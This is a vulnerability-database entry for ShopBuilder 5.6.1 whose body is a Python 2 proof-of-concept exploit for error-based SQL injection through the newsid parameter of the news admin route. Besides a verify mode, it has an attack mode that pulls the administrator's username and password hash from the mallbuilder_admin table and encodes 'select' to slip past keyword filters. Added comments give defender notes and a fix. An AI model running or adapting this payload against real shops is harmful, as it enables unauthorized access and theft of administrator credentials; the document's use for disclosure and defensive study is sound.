ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞

2014-10-28T00:00:00
ID SSV:88924
Type seebug
Reporter Root
Modified 2014-10-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding=utf-8

import re
import urllib2

from comm import cmdline
from comm import generic


# Metadata record for the PoC framework (the ``comm`` helpers imported above).
# Nothing in this file reads it directly -- main() only touches io_info -- so
# it is presumably consumed by cmdline/generic via import.  Keys are left as
# the framework expects them.
poc_info = {
    'VulId': '1568',  # framework-internal id; differs from the SSV id in the page header
    'Name': 'ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞 POC',
    'AppName': 'ShopBuilder',
    'AppPowerLink': 'http://www.shop-builder.cn',
    'AppVersion': '5.6.1',
    'VulType': 'SQL Injection',
    # Desc (zh, kept verbatim below): the ``newsid`` parameter is concatenated
    # into the SQL statement without filtering, and the resulting injection can
    # expose the administrator account and password.  Root-cause fix on the
    # application side is a parameterised query for ``newsid``.
    'Desc': '''
            newsid 未经过过滤拼入 SQL 语句,造成 SQL 注入漏洞,可以获取管理员的账号以及密码。
            ''',
    'Author': ['zhengdt @ knownsec'],
    'VulDate': '2014-09-29',
    'CreateDate': '2014-10-10',
    'UpdateDate': '2014-10-10',
    'References': ['http://wooyun.org/bugs/wooyun-2014-072822'],
    'Version': '1',
}


# Shared in/out record.  cmdline.main() in the __main__ block presumably fills
# it from the command line; main() reads URL/Mode/Verbose and writes
# Status/Result/Error; generic.output() renders it at the end.
io_info = {
    'URL': '',         # target base URL; main() appends '/?m=news/admin&s=news&'
    'Mode': 'v',       # 'v' = verify only, 'a' = also pull admin credentials (see main)
    'Verbose': False,  # when True, main() prints progress lines to stdout
    'Error': '',       # str() of whatever exception main() caught; empty on success
    'Status': 0,       # stays 0 unless main() confirms the injection, then 1
    'Result': {}       # filled with 'VerifyInfo' (mode v) or 'AdminInfo' (mode a)
}


def main(io_info):
    """Run the PoC against ``io_info['URL']`` and record the outcome in ``io_info``.

    Python 2 only (print statements, ``except Exception, e``, ``urllib2``).

    Mode ``'v'`` (verify) sends one crafted request and sets
    ``io_info['Status']`` to 1 when the response carries the hash the
    payload's ``md5(1513644312)`` call is expected to yield.  Mode ``'a'``
    (attack) sends the credential-leaking variant and stores the username
    and 32-character password value parsed from the response.  Every
    exception in either mode is swallowed into ``io_info['Error']`` and the
    function returns.

    Args:
        io_info: shared request/result dict (see ``io_info`` above).  Read
            keys: URL, Mode, Verbose.  Written keys: Status, Result, Error.

    Returns:
        None -- all results go through ``io_info``.

    Defender notes (grounded in the payloads below):
      * The injected parameter is ``newsid`` on the ``?m=news/admin&s=news``
        route.  A request there whose ``newsid`` contains ``%73elect`` or
        ``information_schema`` is a strong indicator of this probe.
      * Both modes depend on the application echoing a raw MySQL
        ``Duplicate entry`` error (the mode-'a' regex matches it explicitly;
        mode 'v' presumably matches the same text).  A parameterised query
        for ``newsid`` removes the root cause; suppressing verbose database
        errors removes the oracle the PoC relies on.
    """
    url = io_info.get('URL', '')
    mode = io_info.get('Mode', 'v')
    verbose = io_info.get('Verbose', False)
    # Opaque framework helper; presumably builds User-Agent/cookie headers
    # from io_info -- not shown in this file.
    headers_fake = generic.modify_headers(io_info)

    # Vulnerable route; the query string is completed by the payload below.
    vul_url = '%s/?m=news/admin&s=news&' % url

    if mode == 'v':
        try:
            # Error-based injection: GROUP BY on floor(rand(0)*2) provokes a
            # duplicate-key error whose text carries the inner value
            # (md5(1513644312) here), which is then looked for in the body.
            payload = 'newsid=11%20and%201=(select%201%20from(select%20count(*),concat((select%20(select%20(s' \
                      'elect%20md5(1513644312)))%20from%20information_schema.tables%20limit%200,1),floor(r' \
                      'and(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
            # Rewrites 'select' as '%73elect' and parentheses as %28/%29.  A
            # keyword blacklist would not see 'select' after this; only a
            # parameterised query (or URL-decoding before filtering) helps.
            payload = payload.replace('select', '%73elect').replace('(', '%28').replace(')', '%29')
            if verbose:
                print '[*] %s - Executing payload ...' % url
            # No timeout is passed, so an unresponsive host blocks this call
            # indefinitely (default socket timeout).
            response = urllib2.urlopen(urllib2.Request(vul_url + payload, headers=headers_fake)).read()

            # Marker expected from the md5() call in the payload; its presence
            # means the injected expression was evaluated by the database.
            if '4be0d4871abae85cae972cd885f5b1e9' in response:  
                io_info['Status'] = 1
                io_info['Result']['VerifyInfo'] = {}
                io_info['Result']['VerifyInfo']['URL'] = url

        # Broad catch: network errors and anything else end up as a string in
        # Error; Status stays 0, so a failure is indistinguishable from "not
        # vulnerable" except through this field.
        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return

    if mode == 'a':
        try:
            # Same error-based construction; the leaked value is now
            # concat(user, ':', password) from the mallbuilder_admin table.
            payload = 'newsid=11%20and%201=(select%201%20from(select%20count(*),concat((select%20(select%20(se' \
                      'lect%20concat(user,0x3a,password)%20from%20mallbuilder_admin%20limit%201))%20from%20' \
                      'information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_sch'\
                      'ema.tables%20group%20by%20x)a)'
            payload = payload.replace('select', '%73elect').replace('(', '%28').replace(')', '%29')
            # Matches the raw MySQL error "Duplicate entry '<user>:<32 chars>1'";
            # the trailing '1' is presumably the floor(rand(0)*2) group key
            # appended by concat().  The 32-character capture suggests the
            # stored password is a hash rather than plaintext -- not confirmed
            # here.  Note the pattern is not a raw string: '\w' and '\d'
            # survive only because Python 2 keeps unknown escapes.
            match_data = re.compile('Duplicate entry \'(.*):([\w\d]{32})1\'')

            if verbose:
                print '[*] %s - Executing payload ...' % url
            # Same untimed request as in mode 'v'.
            response = urllib2.urlopen(urllib2.Request(vul_url + payload, headers=headers_fake)).read()

            if verbose:
                print '[*] %s - Get username and password of admin ...' % url

            # No match (error text not echoed) raises IndexError here, which
            # the broad except below turns into io_info['Error'].
            username, password = match_data.findall(response)[0]

            if username and password:  
                io_info['Status'] = 1
                io_info['Result']['AdminInfo'] = {}
                io_info['Result']['AdminInfo']['Username'] = username
                io_info['Result']['AdminInfo']['Password'] = password

        # Same broad catch as mode 'v'.
        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return


if __name__ == "__main__":
    # Framework entry point: cmdline.main() presumably parses argv into
    # io_info (URL/Mode/Verbose); usage and argvs are passed empty here --
    # what the helper does with them is not visible in this file.
    cmdline.main(io_info, usage='', argvs=[])
    if io_info['Verbose']:
        print '\n[*] Init ...\n'
    main(io_info)
    # generic.output() renders the io_info record; its format is not shown here.
    print generic.output(io_info)